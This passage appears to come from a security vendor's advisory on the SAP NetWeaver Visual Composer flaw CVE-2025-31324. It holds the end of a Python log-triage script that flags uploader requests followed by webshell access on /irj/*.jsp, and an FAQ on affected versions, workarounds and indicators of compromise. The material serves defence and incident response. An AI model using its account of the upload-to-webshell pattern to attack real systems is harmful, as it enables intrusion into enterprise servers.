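    shells = {f["ip"] for f in findings if f["verdict"] == "webshell-access"}
    return uploader & shells


if __name__ == "__main__":
    found = triage_log(SAMPLE_LOG)
    for f in found:
        print(f)
    print("uploader + webshell from same source:", sorted(correlated_sources(found)))
```

The correlation step is the part worth keeping in an IR playbook: a single source that first hits the metadata uploader and shortly afterwards reaches a /irj/*.jsp path with a 200 is the pattern this campaign produced, whereas a lone webshell-access hit from a different source is more consistent with the opportunistic second-wave activity described above.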

Special Support for SAP Customers 

To support qualified SAP customers that require investigation, threat remediation, and additional post-compromise security monitoring, Onapsis is offering a complimentary assessment and a 3-month free subscription to the Onapsis Platform. Please contact [email protected] for more information.

Additional Expert Coverage on CVE-2025-31324 From Onapsis:

Frequently Asked Questions About CVE-2025-31324

Q: Which SAP NetWeaver Java System versions are affected by this vulnerability?

A: SAP has confirmed, in their FAQ SAP Note #3596125, that all 7.xx versions and all SPS are affected.

Q: If we have NetWeaver Java “7.x SPS x” with Visual Component framework installed, are we still vulnerable?

A: Yes – it is highly likely that those systems running the older version of NetWeaver are vulnerable. Additionally, it’s worth noting that SAP NetWeaver Application Server Java 7.40 or below versions are not supported and do not receive updates. For these older versions, you will have to implement one of the workaround options detailed in SAP Note 3593336 if you are unable to upgrade (and subsequently patch) the system.

Q: Which component of the SAP NetWeaver Java System is impacted?

A: The SAP Visual Composer (VCFRAMEWORK) application.

Q: If our SAP is not an Internet-facing environment, are we just worried about insider threats or are we still vulnerable from malicious attackers?

A: The only thing that will change if the SAP application is not Internet-facing is the frequency of exploitation. This vulnerability is CVSS 10.0 and should be considered critical and acted on immediately. Due to the nature of the vulnerability and how it is exploited, we expect to see automated exploit tools taking advantage of this vulnerability and tools that could easily be executed from within a network. Additionally, this could be leveraged by malicious software such as malware or ransomware.

Q: Was this vulnerability found by a researcher, or is it being exploited in the wild and some security services detected the actual attacks?

A: This vulnerability was identified based on observations of active exploitation across SAP applications in the wild by several different incident response teams and security researchers. It was first publicly discussed in a blog post by ReliaQuest.

Q: Are there any specific sectors or industries that malicious attackers are targeting based on the research so far?

A: We are gathering consolidated information related to the targeted industries, but at this stage, all critical infrastructure should be considered at high risk based on the level of threat activity we have seen. Due to the severity of the vulnerability (CVSS 10.0) and how it can be exploited over HTTP, all organizations should take steps to patch or mitigate immediately, in light of the threat activity we have seen over the past couple of days.

Q: Are there any specific operating system platforms that are particularly vulnerable to ransomware?

A: In general, Microsoft Windows-based OSs are the preferred targets for ransomware gangs because mature ransomware tooling exists for that platform. However, the threat of ransomware is not limited to Windows, so do not assume that SAP systems running on a non-Windows OS are immune from a ransomware attack.

Q: How can I check if the Visual Composer is installed?

A: You need to list the components of the SAP system. If “VISUAL COMPOSER FRAMEWORK” (VCFRAMEWORK) is installed, the system is vulnerable, meaning you will have to apply the patch from SAP Security Note #3594142 or leverage one of the mitigations in SAP Note #3593336, which essentially make the component unreachable.

If you are an Onapsis customer, you can use Assess to scan all your Java systems. Assess will identify not only the systems that have the component but report an issue for any that have the component and are not secured against the vulnerability.

Q: How can we identify whether Visual Composer is actually being used? Is it enough to check whether VCFRAMEWORK is installed and its services are running?

A: Determining whether SAP’s Visual Composer is actually being used on a system to develop applications requires analysis of the logs to understand if users are accessing the component. Additionally, you would need to ascertain whether the service is needed at runtime or only during development, which depends on how development is done in the organization.

Q: Is there a risk if the component is in a “stopped” state?

A: That is one of the five workarounds shared by SAP in Knowledge Base Article #3593336. However, this only reduces the risk – it does not eliminate the vulnerability itself. The workaround could be reversed, so a change made in the future could re-expose your enterprise to this attack campaign. The ultimate fix, at this time, remains applying the patch on all vulnerable systems.

Q: Are there any real “temp files” getting created at the OS level as part of attacks?

A: The vulnerability allows the attacker to upload arbitrary files to the OS of the vulnerable system. These would not be temp files but rather specific files uploaded by the attacker. There are various Indicators of Compromise (IoCs) associated with exploitation of this vulnerability, which we are continuously updating here on this page.

Q: Do the original threat actors appear to be financially motivated? Has ransomware been deployed?

A: Regarding the motivation of the attacks, nothing has been disclosed publicly, nor has there been attribution to any particular threat actor group or groups at this time. However, financial gain is always a very common motivation, with ransomware a common device used by threat actors and double extortion an increasingly common attack trend.

Q: Are these indicators of compromise – i.e., the *.jsp, *.java files – expected to be in hidden file formats?

A: Initially, these files would not be hidden. However, bear in mind that after the attacker uploads web-executable code to the system, they gain the ability to perform a large number of administrative actions, which include taking steps to cover their tracks – i.e., making files hidden.
